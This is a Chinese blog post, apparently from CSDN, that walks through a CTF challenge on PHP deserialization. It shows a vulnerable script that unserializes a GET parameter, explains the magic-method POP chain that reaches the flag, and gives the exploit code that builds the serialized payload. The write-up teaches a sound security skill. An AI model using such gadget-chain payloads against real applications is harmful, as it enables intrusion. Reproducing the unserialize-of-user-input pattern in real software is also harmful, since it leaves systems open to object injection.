[SWPUCTF 2021 新生赛]pop

最新推荐文章于 2024-03-27 16:45:38 发布
最新推荐文章于 2024-03-27 16:45:38 发布
阅读量1.6k 收藏 3
点赞数 1
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/124880674
版权

本来该期末考试了放弃看pop链表了,可是突然看着看着就通透了,那就赶紧记录下来,万一忘记了呢。

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

这道题应该是pop链表的入门题,但对于我这种菜鸡来说还是有点难度的,话不多说,直接解析。

unserialize($w00m);从这一行可以看出是进行反序列化操作,从后面往前推最后肯定是为了调用输出Getflag------>想要调用这个就用到了魔术方法 ————tostring---------->想进行这个就用到了—destruct魔术方法。所以顺序已经摸清楚接下里构造。


 

看下图,

$a = new w22m();是把类给了a

然后$a->w00m = new w33m();因为w22m中woom是其中的可控对象 ——tostring操作就是

$a->w00m->w00m=new w44m(); w33m中woom也是其中可控对象

$a->w00m->w22m='Getflag';

w00m是w33m对象,w22m是getflag

<?php
class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';
}
 
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}
class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}
$a = new w22m();
$a->w00m = new w33m();
$a->w00m->w00m=new w44m();
$a->w00m->w22m='Getflag';
echo urlencode(serialize($a));
 
?>
偶尔躲躲乌云334
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
SWPUCTF 2021 新生
weixin_44770698的博客
12-21 3377
SWPUCTF 2021 新生(日常练习)
[SWPUCTF 2021 新生]pop(NSSCTF)
m0_70819573的博客
03-03 290
phppop链的原理是构造不同类相互调用的链条,调用php的魔术方法来实现flag的读取。1.打开环境,审计代码。
[SWPUCTF 2021 新生]pop-----WP
pythllc的博客
10-23 333
源码展示。
辞郁POP打印工具(2021-06-18)
11-08
辞郁POP工具主要用于:打印零售软件中商品POP促销单。 本程序使用于:思迅软件、科脉软件、百威软件、泰格软件、嬴通软件等。 安装配置完连接参数后,用默认管理员账号:辞郁,密码:ciyu登录,主界面左上角,双击...
Pop-up Photo Wall 1.6
08-09
Pop-up Photo Wall 1.6
Uni_pop.rar_pop
09-20
标题中的"Uni_pop.rar_pop"可能是指一个名为"Uni_pop"的程序或工具,它与电子邮件的POP(Post Office Protocol)协议有关。POP是互联网上用于接收电子邮件的标准协议,允许用户从邮件服务器下载邮件到本地设备。这个...
pop.rar_pop
09-22
"pop.rar_pop"这个文件名可能是指一个压缩包,其中包含了与Java相关的代码或资源,特别是与图像处理和用户界面设计有关的部分。描述中的“image resize in java can be used in applet or window”暗示了压缩包内的...
SMTP.POP.rar_pop
09-14
在这个"SMTP.POP.rar_pop"压缩包中,包含了一个名为"SMTP.POP.ppt"的文件,我们可以推测这是一个关于SMTP和POP协议的PowerPoint演示文稿,它可能详细讲解了这两个协议的工作原理、使用方法以及在DOS环境下如何通过...
php反序列化——pop链构造[SWPUCTF 2021 新生]pop [NISACTF 2022]babyserialize
最新发布
m0_73756016的博客
03-27 816
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的链条是(反推)
[SWPUCTF 2021 新生]WEB刷题记录
m0_73239569的博客
11-16 133
往下看,w33m类的__toString()方法可以做到这一点,所以需要让$this->w00m为w44m类,而$this->w22m为“Getflag”。因此我们构造的东西($jay17),他是序列化后的w22m类,w22m类里面的变量w00m=w33m类,w33m类里面的变量w00m为w44m类,w33m类里面的变量w22m为w44m类里面的Getflag函数,并且w44m类的admin和password变量为w44m和08067。如果存在,它将获取该参数的值,并使用正则表达式检查是否包含空格。
NSS [SWPUCTF 2021 新生]pop
Jay17的博客
07-27 307
NSS [SWPUCTF 2021 新生]pop
ctf-pop
qq_32445755的博客
05-15 1875
POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可
CTF笔记 [SWPUCTF 2021 新生]pop
qq_51248658的博客
10-28 2517
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
NSSCTF题库[SWPUCTF 2021 新生]+部分新生签到题
热门推荐
J1ng_Hong的博客
10-27 1万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
2021商业广场POPMART海绵宝宝IP展开幕仪式活动策划方案【潮玩】【IP】.pptx
05-09
2021年6月26日,成都商业广场在XX区举办了盛大的POPMART海绵宝宝IP展开幕仪式活动,策划方案涵盖了IP潮玩元素,吸引了众多媒体和粉丝的关注。这一活动以海绵宝宝IP为主题,吸引了成千上万的潮玩爱好者和IP粉丝前来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值